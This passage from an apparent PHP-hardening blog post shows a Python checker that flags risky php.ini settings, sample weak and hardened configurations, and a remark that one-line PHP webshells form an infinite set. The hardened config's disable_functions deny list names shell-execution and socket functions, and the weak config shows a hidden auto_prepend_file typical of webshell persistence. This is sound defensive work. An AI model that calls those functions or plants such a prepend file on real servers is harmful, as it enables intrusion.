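    missing = [f for f in REQUIRED_DISABLED if f not in disabled]
    if missing:
        findings.append("disable_functions is missing: " + ", ".join(missing))
    if not conf.get("open_basedir"):
        findings.append("open_basedir is not set; file functions may reach anything the web user can read")
    if is_on(conf, "expose_php"):
        findings.append("expose_php is On; the PHP version leaks in the X-Powered-By header")
    if is_on(conf, "allow_url_fopen"):
        findings.append("allow_url_fopen is On; remote URLs can be opened by the file functions")
    if is_on(conf, "allow_url_include"):
        findings.append("allow_url_include is On; include/require accept remote URLs")
    if not is_on(conf, "log_errors"):
        findings.append("log_errors is not On; without an error log there is little to investigate later")
    for key in ("auto_prepend_file", "auto_append_file"):
        if conf.get(key):
            findings.append(key + " = " + conf[key] + "; this file runs inside every PHP page, verify it")
    return findings


# Constructed fragments: one that mirrors a default-ish install, one that follows the post.
WEAK_INI = """
; constructed weak configuration
expose_php = On
allow_url_fopen = On
log_errors = Off
disable_functions = phpinfo,chroot
auto_prepend_file = "/var/www/html/.conf.php"
"""

HARDENED_INI = """
[PHP]
expose_php = Off
allow_url_fopen = Off
allow_url_include = Off
log_errors = On
open_basedir = "/var/www/html:/tmp"
disable_functions = phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,stream_socket_server,get_current_user,leak,putenv,popen,opendir
auto_prepend_file =
auto_append_file =
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label + ":")
        for finding in check_php_ini(text) or ["no findings"]:
            print("  -", finding)
```

Run it against the output of php --ini (the loaded file) rather than the file you think is loaded; the auto_prepend_file check in particular only helps if it looks at the configuration PHP is really using.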
In summary, the set covered by the concept [php one-line webshell] is an infinite set; this is probably not a data problem but a mechanism problem.
